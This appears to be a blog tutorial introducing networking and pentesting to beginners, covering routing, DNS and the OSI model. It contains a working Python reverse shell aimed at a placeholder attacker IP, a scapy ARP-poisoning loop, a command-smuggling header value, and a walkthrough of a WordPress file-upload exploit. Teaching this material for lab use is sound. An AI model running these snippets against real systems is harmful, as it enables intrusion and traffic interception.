Networking Basics - Pentesting Training part 1

Primer:

    I want to make a tutorial that I could show my kid to help them understand hacking: the methodology, the basics, and so on. This is an introduction post, more will follow, and maybe I can add a video series to go along with it.

    The first thing to talk about is the what and the why. Technology, while ever changing, will always fall victim to several problems:
  1. First is that the use case imagined at creation won't match the use case performed in practice. For example, a TV remote may use infrared light pointed at the TV, and that works fine when one TV is in the room at a time. When more than that are added, conflicts arise: the light from the remote is picked up by the infrared sensor on multiple TVs. Change channels on one, both go.
  2. Second is that nothing created by man is, or is capable of creating, flawlessness.
  3. Third is that business profits drive innovation, but not perfectionism (or even the attempt to get close to perfect).
    With these issues taken together, one can rationalize that hacking, the intentional modification or alteration of anything (not just computing) for unintended purposes, will continue to be predominant into the future. As a short example, language (both written and spoken) has been misused by spies, monks, and anyone needing to hide information, creating non-natural languages that could convey messages in private. Cases of this date back to before ancient Egypt and continue today. As such, hacking is not a one-stop shop: studying what you have, what you see, and what you are presented with, then finding ways around them with whatever is available, is the way to approach hacking IMO.

Understanding:

    So, let's start with what we see today. We have computers that can talk to each other with and without human interaction. We have computers used to talk to other people, computers in our phones, in our cars, in our billboards, TVs, watches, even light bulbs, screws, and breaker boxes. We live in a very technologically reliant world, and all of those computers I just mentioned can communicate through the internet.

What is the internet:

    The internet is a series of tubes. Or so say popular memes and that one guy you can google outside of this tutorial. A good way to think of the internet, in my mind, is a multiplexed form of that kids' game where a secret gets whispered down a line and is corrupted by the end. But let's say that for everyone in the line, you added more people in front of and behind them. Then, at the same time, everyone told everyone else a secret along with who it was designated for. Then they keep sending messages whenever they want to whoever they want, while passing along each other's messages as well. It would be hard to keep the data unchanged going through all that, wouldn't it? Every time you send data from your device (laptop, desktop, phone, car, TV, picture frame, whatever), it gets passed along hop to hop like this, in a mechanism called routing.

    It's a little more complicated than that though. You say you want to send data to some IP address; "okay, let's do that for you," says the router, and it forwards the data to the next router, then the next, all in hopes of reaching the destination. But how would we, in our example of kids whispering secrets to each other, know the best way to get that information to the right participants? Well, what if we gave everyone a number, and our message was "number={whatever number}, {whatever the message was}"? And how could we make sure everyone knew how to transport that to the right user? Since computers communicate so fast, this is done using what are called protocols: procedures to follow so everyone agrees on how something is sent or received, and what to do with it afterward. IP addressing is part of the Internet Protocol.
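
    To make the "number={n}, {message}" idea concrete, here's a tiny toy protocol in Python. Everything in it is invented for illustration; real protocols define binary header layouts rather than text, but the principle of an agreed-upon format is the same:

        # A toy "protocol": an agreed-upon format for addressing a message.
        def wrap(dest_number, message):
            # Rule 1: every message starts with who it's for.
            return f"number={dest_number}; {message}"

        def unwrap(wire_data):
            # Rule 2: receivers split the address off before reading the body.
            header, body = wire_data.split("; ", 1)
            dest = int(header.split("=")[1])
            return dest, body

        packet = wrap(12, "how was your day?")
        print(packet)           # number=12; how was your day?
        print(unwrap(packet))   # (12, 'how was your day?')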

    It's still more complicated than that. Because there are so many devices connected, how do we know who is responsible for ensuring data gets to the right IP? In the kids example, let's separate those kids into classrooms, where each teacher is responsible for ensuring messages reach their own students. That teacher has to tell the other teachers "I am responsible for kids 20 through 30." They do so by broadcasting, often loudly, to the nearest teachers, so each teacher can document what every other teacher has said, as well as pass along data requested by other teachers. This is, in essence, what the protocol known as BGP does. It works alongside a registry of teachers, known as ASNs, or autonomous system numbers. Literally, that means numbering the systems that are approved to broadcast as one of those teachers. So, teachers 1 through 75, as an example.
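
    If it helps, here's a minimal Python sketch of the announcement idea, with made-up teacher (ASN) and kid numbers. Real BGP announces IP prefixes between routers and involves path selection, trust, and much more, so treat this strictly as the classroom analogy in code:

        # Each "teacher" (autonomous system) broadcasts which "kids"
        # (addresses) it is responsible for; everyone records the claims.
        routes = {}   # kid number -> ASN that announced responsibility

        def announce(asn, first_kid, last_kid):
            for kid in range(first_kid, last_kid + 1):
                routes[kid] = asn

        announce(asn=3, first_kid=20, last_kid=30)  # "I handle kids 20-30"
        announce(asn=7, first_kid=31, last_kid=45)

        def next_hop(kid):
            # To reach a kid, hand the message toward whoever announced them.
            return routes.get(kid, "no route")

        print(next_hop(25))   # 3
        print(next_hop(99))   # no route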

Don't worry, it's not that bad!

    There are actually a number of ways the efficiency of this system has been increased over time. While it's not worth going into them all, I feel it would be lacking if I skipped the essential case of OSPF (Open Shortest Path First), a protocol designed to compute the shortest path first. In the example: if it's cheaper to tell kid 7 in class 3 and have them pass the message along to kid 8 in class 4 in order to reach kid 12 in class 4, then the only information needed is which kids are in each class, which should be broadcast by each teacher.
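
    The "shortest path first" part is a real algorithm (Dijkstra's), and it's small enough to sketch. Below is a minimal Python version over a made-up classroom map; real OSPF builds its map from link-state advertisements flooded between routers, but the path calculation is the same idea:

        import heapq

        # Made-up classroom map: each edge is (neighbor, cost).
        graph = {
            "class3": [("class4", 1), ("class5", 4)],
            "class4": [("class3", 1), ("class5", 1)],
            "class5": [("class3", 4), ("class4", 1)],
        }

        def shortest_path(start, goal):
            queue = [(0, start, [start])]   # (total cost, node, path so far)
            seen = set()
            while queue:
                cost, node, path = heapq.heappop(queue)
                if node == goal:
                    return cost, path
                if node in seen:
                    continue
                seen.add(node)
                for neighbor, weight in graph[node]:
                    heapq.heappush(queue, (cost + weight, neighbor, path + [neighbor]))
            return None

        # The direct class3->class5 link costs 4; going via class4 costs 2.
        print(shortest_path("class3", "class5"))  # (2, ['class3', 'class4', 'class5'])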

Almost done:

    The reason for describing all of this is to let you understand how these things work together in daily life. There is a whole other piece to talk about in this regard. You may know that when you connect to a website like facebook or youtube or amazon, you connect through a name, but computers use those other addressing schemes and protocols. The solution that made such a network widely usable for home users came from the idea of DNS (the domain name system). This functions in a top-down approach: starting with top-level domains (think of .com, .gov, .cloud, .solutions, etc., and all the sites you've seen like those), then the next level down (feemcotech.solutions), then the next level, and so on. The owner of the TLD controls who gets to create domains inside it. As such, the organization that owns .cloud, for instance, controls who owns evil.cloud or myfakewebsite.cloud, but each of those in turn controls access to each subdomain under it: feemcotech.evil.cloud would be under the control of evil.cloud. At each level, DNS has name servers delegated by the level above that say where to find more information, such as the records mapping a name to an IP address for, say, google.com.
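
    You can watch this happen from Python with nothing but the standard library; the local resolver does the top-down walk (and the caching) for you:

        import socket

        # Ask the local resolver to chase root -> TLD -> authoritative
        # servers and hand back an address record for the name.
        print(socket.gethostbyname("google.com"))   # e.g. 142.250.72.14 (varies)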

    The whole process looks roughly like this, with wide variations here and there, and completes in small fractions of a second.

    [Diagram omitted: the DNS lookup flow from your device to the local resolver, out through the root, TLD, and authoritative name servers, and back.]

    Then of course, once we know where we want to go, we need simple things like what to transfer, how, when, and so on. In a situation like reaching google, the procedure works by asking your local DNS service to start at the top level and burrow down until it gets the record associated with the name you're searching for. This goes up the routes and back down the routes to complete a conversation, as described by the whispering idea. The next step, once we have those records, is to start talking to the machine we really wanted, by saying "now we know the number of the class and the student, let's go ask him how his day is." So we do another conversation up and down the routes, but this time directly with the target of our communication. For google, there is a known, or at least expected, open port to connect to for this conversation. In the children example, ports would be something like sorting slots, so the kids can have multiple conversations going at once. Recording the outbound port used lets both sides know where incoming traffic goes and where it came from. This is used in protocols like TCP and UDP, which act as front-men to other protocols. Google being the example here, we want web traffic, so http or https. If we try to connect over http, google, like many sites, redirects the traffic to https (ssl/tls encrypted http traffic).
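
    You can see that http-to-https redirect yourself with Python's standard library. A plain-text request to port 80 typically comes back with a 3xx status and a Location header pointing at the https:// version (the exact status and target vary by site):

        import http.client

        # Talk plain HTTP on port 80 and look at the raw response.
        conn = http.client.HTTPConnection("google.com", 80, timeout=10)
        conn.request("GET", "/")
        resp = conn.getresponse()
        print(resp.status, resp.reason)       # typically a 301 redirect
        print(resp.getheader("Location"))     # where it wants you to go instead
        conn.close()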

    This isn't a bunch of stuff you need to memorize, please don't see it that way. It's just to help you understand that these are all very simple ideas that only seem complex when placed together. Or, one could say, complexity is the amount of layering of simple things that has to be in place to do the complex task.

Models and graphs:

    One very popular thing to do in this realm is to create models, representations of these complex ideas, in hopes of furthering understanding of the topic. Well-known models that explain this scenario include the TCP/IP model and the OSI model. Knowing these is fairly essential for understanding the computer networking ideas used today, and there is A TON of information about them available online. The basis of both models is to separate which protocols fall under which layer in the complex world of computer networking. I think the OSI wikipedia page has the best current resource for this in a single table, summarized here:

        Layer 7  Application   (data)      high-level protocols: HTTP, DNS, SMTP...
        Layer 6  Presentation  (data)      encoding, compression, encryption
        Layer 5  Session       (data)      opening/closing sessions between hosts
        Layer 4  Transport     (segments)  TCP, UDP; ports live here
        Layer 3  Network       (packets)   IP, ICMP; routing lives here
        Layer 2  Data link     (frames)    Ethernet, ARP; MAC addresses
        Layer 1  Physical      (bits)      cables, radio, light

    For many years now, a Python tool called scapy has made understanding, testing, and programming things on these layers much easier. Prior to that, I always had to look back at protocol specs to understand how to write code that would fall in line with them. Needless to say, it sucked trying to understand what you were writing like that, and many people still code to this day without understanding the architecture or why they should draw out a model before programming it. A lot of socket control is done by the kernel of the respective operating system these days, and no one should exactly be programming in real-mode assembly, but once we understand some basic networking, we can worry later about finding deviations in the implementations of these protocols, or even flaws in the protocols themselves, as attack vectors. A couple of examples from a quick google search of protocols now deprecated or considered insecure by design include SMBv1 (later versions fixed those issues, though implementations can still introduce their own) and WDigest. You can research how those exploits were found and how easy it is today to attack these situations.
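
    As a taste of scapy (pip install scapy; sending raw packets usually requires root), here's a sketch that builds a TCP SYN layer by layer and fires it at a placeholder address. You can see the model in the code itself: IP is the network layer, TCP the transport layer, stacked together with the / operator:

        from scapy.all import IP, TCP, sr1

        target = "192.0.2.10"                             # placeholder documentation IP
        pkt = IP(dst=target) / TCP(dport=80, flags="S")   # network / transport layers
        pkt.show()                                        # print each layer's fields

        reply = sr1(pkt, timeout=2)                       # send, wait for one reply
        if reply is not None and reply.haslayer(TCP):
            # A SYN/ACK back means the port is open; an RST means closed.
            print("reply flags:", reply[TCP].flags)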

    Another thing that's really useful is drawing charts or graphs to identify problems. Defenders do this when determining the scope of the threat landscape and understanding weak points, in a process called threat modeling. Attackers often use tools to make it easier to understand where to guide their attacks next, and pentesters (security professionals acting as attackers) use these same tools, their own, or hand-drawn diagrams as needed, to present attack vectors to the client who is paying them to attack their systems or services. This diagramming seems to have a high return on investment for the time spent; to say it another way, people pay more for your time if you do this, and they in turn can act on and understand their security risks better. An example attack flow taken from a Hack The Box challenge:

    [Chart omitted: nmap scan -> open ports -> website -> vulnerable application -> public exploit -> reverse shell as a user -> readable password file -> root.]

    In this quickly made chart, we see the scan being performed (with nmap, the scanning tool) and the relevant ports, which connect to the website to show the flow: this port leads to this site. We then see the site is running a program with a known vulnerability. The exploit has a github link and easily runs a command-line shell on the system. This gives the attacker access as a user without ever having to SSH into the system. That access was then used to find an encrypted version of a password in a file the user could read. From there, the password for the root account (the highest user privilege on the system) was recovered, allowing the attacker to switch user to root using that password, without ever needing SSH access (the normal way a user would log in to the system and run commands).

    Since this is still a network-based tutorial, let's think about the network transactions that happened here. Our scanning tool (nmap) showed results for open ports we could connect to. That means IP packets, containing in this case TCP payloads, which in turn carried probes that try to elicit data from the system and identify the application running, were sent to the target, finding open ports and the services associated with them. Even if that detection was mistaken, in this case it didn't matter much beyond knowing to try a webpage. We then sent a request to the web page, where we found information telling us what technology/application was underlying the website. We used that to research elsewhere how to exploit it. The exploit then made a new series of requests to the site and ran a command that gave us a command interface, which connected back to our system on a different port we had listening. This is called a reverse shell or connect-back shell. We then exchanged data back and forth through the rest of the exploitation using this communication mechanism.
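
    To demystify the connect-back part, here's a minimal reverse shell sketch in Python, for use only against lab systems you own. The attacker listens first (for example with nc -lvnp 4444), the victim side runs something like this, and the shell's input and output flow over the outbound socket; the IP and port are placeholders:

        import socket, subprocess

        ATTACKER_IP, ATTACKER_PORT = "192.0.2.99", 4444   # your listener

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((ATTACKER_IP, ATTACKER_PORT))   # outbound connection, so it
                                                  # dodges inbound-only firewall rules
        # Wire the shell's stdin/stdout/stderr directly to the socket.
        subprocess.call(["/bin/sh", "-i"],
                        stdin=s.fileno(), stdout=s.fileno(), stderr=s.fileno())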

Attack:

    A simple attack you can try is the popular man-in-the-middle attack known as ARP cache poisoning. Here we operate at a lower level and tell the network that we are the hardware for the IP addresses in question. When you join a network, your machine asks who-has {ip address} to determine which hardware (MAC) address to send traffic for that IP to. If we answer quicker than the correct system, we can make systems on the network believe we are that system and send their traffic to us. Usually this doesn't mean much for connections that are already established, as we may not even need those; forward them along somewhere if needed. But for new connections, if we tell everyone else on the network that we are the router, and tell the router that we are everyone else, we can sit in the middle of every new connection, acting as the router. Remember our earlier example, where the routers were the kids who heard things and passed them on: that's what we're doing here, except we've stepped in between two kids and told each that we're the other. There are many tools to do this, such as bettercap, mitmproxy, etc., and you can do it manually with scapy as well (see the sketch below). In some environments, EDR and firewall services can detect ARP poisoning by finding multiple answers on the network for the same ARP request, multiple MACs claiming different IPs, or an ARP response different from what was expected. Tracking by MAC isn't a very popular solution these days either, since most devices now randomize their MAC addresses (android phones do by default, iphones have the option, it's been built into mac and linux for many years, and windows can do it depending on your device driver). There are also a variety of tools that monitor a network for new devices, even scanning them as they join, to determine what they are and hopefully match them to expectations.
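
    Here's roughly what that looks like with scapy, again only in a lab you own. The addresses are placeholders, and if you want traffic to keep flowing while you sit in the middle, you'd also enable IP forwarding on your box (echo 1 > /proc/sys/net/ipv4/ip_forward on linux):

        import time
        from scapy.all import ARP, send

        victim_ip, gateway_ip = "192.168.1.50", "192.168.1.1"   # placeholders

        while True:
            # op=2 is an ARP reply ("is-at"). We claim the gateway's IP
            # (psrc) to the victim, and the victim's IP to the gateway;
            # scapy fills in our real MAC as the source hardware address.
            send(ARP(op=2, pdst=victim_ip, psrc=gateway_ip), verbose=False)
            send(ARP(op=2, pdst=gateway_ip, psrc=victim_ip), verbose=False)
            time.sleep(2)   # re-poison before the caches age out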

    Network attacks are vast and wide, and with many modern applications being layered over https, it's hard to imagine many purely network attacks being relevant today from the outside, but inside a network is a whole different ball game. In many cases, exploits are chained to achieve network attacks. For example, an exploit on a web server where it attempts to resolve DNS for a field that seems unused, such as the x-forwarded-for header. You don't need to know exactly what I'm talking about here, but web services pass headers back and forth carrying various data to the server and to the browser so each can react accordingly. In some cases, load-balanced systems use x-forwarded-for so a proxy in front of the web service (a middleman that also helps offload heavy site usage to another instance of the same server) can pass along the original client address. In any case, this header enables a variety of attack vectors, mostly posing as someone internal in hopes of getting different information. In my case, instead of putting an IP address in this field, I put a domain name. Their specialized server's socket programming automatically tried to detect whether the value was an IP or a hostname, and responded with an IP if it was a hostname, so I was able to influence the DNS requests made as this value came in. Instead of evil1.attacker.local I chose evil1\x0a\x0a;[command].attacker.local, which broke the lookup of the attacker.local domain: the lookup started, crashed, and the attempt to recover meant the ability to run a command. This allowed command injection because the system was using a network protocol by default behind the scenes.
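
    A sketch of probing that kind of behavior in a lab you control might look like the following; the hostname, URL, and header value are placeholders, and the point is simply that a header you control can end up driving a DNS lookup on the server's side:

        import http.client

        # Send a hostname where the backend expects a client IP. If the
        # server tries to resolve it, the authoritative DNS server for
        # attacker.local (which you'd run) sees the lookup arrive.
        conn = http.client.HTTPConnection("target.lab", 80, timeout=10)
        conn.request("GET", "/", headers={
            "X-Forwarded-For": "evil1.attacker.local",
        })
        print(conn.getresponse().status)
        conn.close()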

    When attacking networks, these are the biggest things to understand:
  • Scope: For those not involved in this sort of work, scope basically means what you're allowed to attack. If you're trying to attack a wireless network for access to the network, sweet. If you're trying NOT to take it further than proving you can access it, that's a scope limitation. Understanding what is a target and what is not allows you to plan accordingly.
  • Technology stack in use: Sometimes you can run easily found exploits with no real thought put in, and that's fine if it gets you where you expect to be, but unless you learn something from it, was it useful to you? Probably not, unless you want to stay dependent on it. Know what technology you're attacking, what mechanisms are supposed to be in place, and what mechanisms are known to be broken or breakable, then try to find new ways to break it. If you're attacking a wireless network for access, you'll want to know what encapsulation it uses, what encryption it uses, and which protocol standard it follows before launching any real attacks. If you're attacking a website, try using the website first, or while scanning, to see if it runs known technology. Whatweb and similar tools are great for finding the tech involved, but a form that lets you upload anything at all and then open it is a free and instant win for anyone spending the moment or two to find it.
  • Interoperability, or how related systems operate with each other: This may be part of the tech stack, but it may not be, so I have to mention that knowing how systems are related is sometimes essential. An active directory domain controller can grant access to systems controlled by the domain, while a web server may just be a standalone web server. But if that web server has access to the domain controller's web interface, that may mean the ability to brute-force logins to the powershell web interface and gain access to the entire network straight from the web server. Or a TV that has a wireless connection feature and has never been updated, but is also hard-wired to the corporate network to run netflix, means you may only need to exploit a TV you can connect to wirelessly to gain access to the entire network.
    As a lab project, why don't we go ahead and try to set up a simple website container that we know we can test some exploits on. Hacking websites is a good starter method, but let's keep in mind all the network transactions going on while doing these attacks. For starters, head over to docker or podman and get yourself acquainted with setting up containers. This will be the basis for how we set up and run labs, and it is substantially faster than standing up and destroying virtual machines. For the actual lab itself, a quick google search suggests this one right here, https://github.com/vavkamil/dvwp, as a good exploitable wordpress setup. It includes the pieces needed to set up the application (typically a git clone followed by bringing it up with docker-compose; check its README).

    Once we have that set up, let's also set up our attacker container, https://hub.docker.com/r/parrotsec/security, which you can use to attack that wordpress site. Use whatever skills you want, whatever tools you want; just know that there are at least 6 ways to exploit it built into the system, so find all of them!

  • To get you started, I have an example up and running here. It starts off by giving you a nice little welcome; clearly this site wants to be hacked, it even says so:

  • Let's go ahead and verify the plugins are available, using wpscan (something along the lines of wpscan --url http://target --enumerate p, adjusted for your lab's address):

  • Go ahead and google some attacks that can be done here and see what you can do!

Defense:

    On the defense side, we need to know what attacks are plausible and what connections /can/ be made, then understand the likelihood and the risks involved in preventing those connections. We also need to determine appropriate blocking for each level we're on. Blocking an IP from https won't stop a vulnerability like the one tracked as CVE-2020-10564 from being exploited. A CVE is a designation given to a known, tracked vulnerability in software, while CWE covers the more generic weakness types that can be found; you can research that on the side, it's somewhat out of the realm of this post. Anyway, CVE-2020-10564 is an exploit chain documented well in this script, which serves as a proof of concept (evidence the concept works) for the exploit: https://github.com/beerpwn/CVE/blob/master/WP-File-Upload_disclosure_report/CVE-2020-10564_exploit.py . The vulnerability exists in a plugin (php or other files designed to run with authentication and other mechanisms inside the larger technology) installed in the wordpress platform, which is a website blogging service that uses php and can be hosted on most web servers (apache, nginx, etc.). The connection chain leading to these tends to be an ssl/tls encrypted tcp connection to port 443, over ip. The example lab can use http without encryption, and is designed to be unencrypted. This means you can use wireshark or tcpdump or any similar network sniffing tool to monitor your attacks and track their flow. That is the general principle behind network flow monitoring, and alerting is generally added on top of it to automate the process. Firewalls of one kind or another are generally where you'd want to apply this sort of understanding, and the better your detection at each layer, the more appropriately you can respond.
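
    Since the lab traffic is unencrypted, you can watch it with tcpdump or wireshark, or from scapy itself. This little sniffer (needs root; scapy picks a default interface) prints a flow-style line per packet, which is the same information flow monitoring systems aggregate:

        from scapy.all import sniff, IP, TCP

        def show(pkt):
            # One line per TCP packet: who talked to whom, on what port.
            if pkt.haslayer(IP) and pkt.haslayer(TCP):
                print(pkt[IP].src, "->", pkt[IP].dst, "port", pkt[TCP].dport)

        sniff(filter="tcp port 80", prn=show, count=20)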

    Looking at the proof of concept for this exploit, it appears to follow a chain of events something like this (a rough sketch follows the list):
  • The payload gets set to a directory traversal (../) that climbs out of the current folder and into the plugins directory, then the wp-file-upload and lib folders respectively. Afterward it appends the filename: payload = "../plugins/wp-file-upload/lib/" + filename
  • It then hex-encodes that: payload = payload.encode("hex") (a Python 2 idiom)
  • It then sets a common php backdoor as php_code and computes a file size from it.
  • It then sends a request to the site's /wp-admin/admin-ajax.php page.
    • That request is a POST to the plugin using an ajax action, wfu_ajax_action_ask_server. Ajax is a set of programming techniques aimed at making client-side interfaces more responsive. In this case it's used by wordpress to facilitate page interactions that are expected to come through this interface instead of from a direct connection to the page.
    • If that responds with wfu_askserver_success, it makes another request, which appears (from a rough glance) to set some basic information about the file to be sent.
    • If that succeeds the same way, it then sends additional data including the file content, in this case the php code.
  • It then sends a request to the target with a parameter specified by the php shell that should now be uploaded and running.
    • It loops, waiting for a command and then sending the request with the command added, until exit is entered.
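
    For flavor, here's a loose Python 3 sketch of just the first request in that flow. It is NOT the real PoC (read the linked script for the actual parameters and the follow-up requests); the target URL and the second field name are placeholders, and the hex step shows the modern equivalent of the PoC's Python 2 payload.encode("hex"):

        import binascii
        import urllib.parse, urllib.request

        target = "http://target.lab/wp-admin/admin-ajax.php"   # placeholder
        payload = "../plugins/wp-file-upload/lib/" + "shell.php"
        payload_hex = binascii.hexlify(payload.encode()).decode()

        data = urllib.parse.urlencode({
            "action": "wfu_ajax_action_ask_server",  # ajax action from the PoC
            "params": payload_hex,                   # placeholder field name
        }).encode()

        resp = urllib.request.urlopen(urllib.request.Request(target, data=data))
        print(resp.read()[:200])   # look for wfu_askserver_success in the reply
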
    How can we protect against this? That seems like it's many layers up the stack and not really something manageable! OH NO! But wait: anything complex is just a series of simple things. This isn't a hard problem, just a complex one. If we had a firewall, a system or program geared toward blocking at various levels, where should we implement a block to prevent this attack? The real answer is we should fix the code to never allow it, but let's pretend we can't do that for whatever reason.
  • Would blocking tcp connections help? Nah, probably not because that would stop the website from functioning. 
  • Would blocking atm traffic help? Nope, that's entirely irrelevant.
  • Would blocking http traffic help? Nope, again, would stop site from functioning.
  • Would blocking arp traffic help? No, that would stop local communication and ultimately still end in site not functioning again.
  • Would creating an application gateway that blocks anything running Visual FoxPro from making write attempts help? This too is entirely irrelevant.
  • Would creating a php application gateway that could limit the requests php makes to the filesystem help? Yes, though this may need to be expanded on to really understand its scope. It would stop the initial ../ directory traversal used to reach the library folder this gets written to.
  • Would creating an ajax gateway that could block known-exploitable calls from being sent to the ajax php code help? Yes as well.
    So from a quick rundown of what makes sense here, we'd need some way to prevent calls we don't like from being accepted by the ajax service, and also to prevent calls from php to the filesystem that we don't want. For the ajax side, a simple way would be a deny-list of functions or likely-suspicious calls: make a php page that grabs the entire request, checks each portion of it against known issues, then forwards it on to the real page. Then rename the real page, restrict it from being run directly by the webserver (so users can't forge requests to it), and make it expect data only from the filtering page as a limitation on where it can receive requests from. That would be an easy way to handle this without specialized tooling or million-dollar platforms. For the php side, there is already a handler inside php for this in the php.ini file (the open_basedir directive can restrict which paths php may touch). In both cases, you could also put something just outside the system, a web application firewall (WAF), to further limit these and many other events.
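
    The filtering page described above would be php in practice; here's the same deny-list gateway idea sketched as a tiny Python WSGI filter instead, with the blocked strings and the stand-in app invented for the example:

        import io
        from wsgiref.simple_server import make_server

        DENY = [b"wfu_ajax_action_ask_server", b"../"]   # example deny-list

        def real_app(environ, start_response):           # stand-in for the real page
            start_response("200 OK", [("Content-Type", "text/plain")])
            return [b"hello from the real page"]

        def gateway(environ, start_response):
            # Grab the entire request (body + query string) and check each part.
            length = int(environ.get("CONTENT_LENGTH") or 0)
            body = environ["wsgi.input"].read(length)
            query = environ.get("QUERY_STRING", "").encode()
            if any(bad in body or bad in query for bad in DENY):
                start_response("403 Forbidden", [("Content-Type", "text/plain")])
                return [b"blocked"]
            environ["wsgi.input"] = io.BytesIO(body)     # let the real page re-read it
            return real_app(environ, start_response)

        if __name__ == "__main__":
            make_server("127.0.0.1", 8080, gateway).serve_forever()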

Risk versus reward

    Unfortunately, with defense there will always be a problem of risk versus reward. The best-case scenario would be to layer all these defenses together, not just pick one. If you created a means of controlling ajax, and a means of controlling php, and controlled file/folder permissions correctly otherwise, and also provided a WAF implementation, that would be extremely ideal. But in reality that's a lot of things to maintain, adjust to new code, administer, or otherwise simply keep running over a long time as new technologies come in. Things that are admin-intensive or developer-intensive (both may apply here) are hard for companies, because it means paying someone for them, and that takes money away from other things, like the website itself being updated or customers getting their products or services. Given that, what is the least intensive, highest-security option? In many cases a WAF is plenty to prevent all of these types of issues, but that heavily assumes the WAF was configured properly. Some sites pay for a managed WAF run by azure or cloudflare, and in many of those cases leave only the default ruleset and never change anything. But that same managed ruleset can be applied across a wide variety of tools and services, so it costs less to apply it across the board than it would cost in dev time to monitor every call at the system-by-system or container-by-container level; it prevents the traffic from ever crossing the network to those systems by being the gateway for all of them. Site.evil.private and wordpress.evil.private could both be controlled by the same WAF with the same rules, while both exist in containers inside kubernetes clusters, on servers hosted by three different companies, if we wanted to scale that way. For a single person, though, it may be more cost-effective to spend the development and admin hours themselves on their website and never put it behind a WAF. There's a bit further we could get into here, like load-balancing techniques, tools to prevent dos attacks, etc., but this should be a good stopping point.

Stay tuned...

    I'll try to post more along these same lines and get more into how to do various things, but I feel like a primer, some methodology, and some reasoning were needed before we get into telling people to run a command here or a command there.

Thanks for reading

If you need any IT or CyberSecurity work remotely or within the DFW area, please contact us over at FeemcoTechnologies.
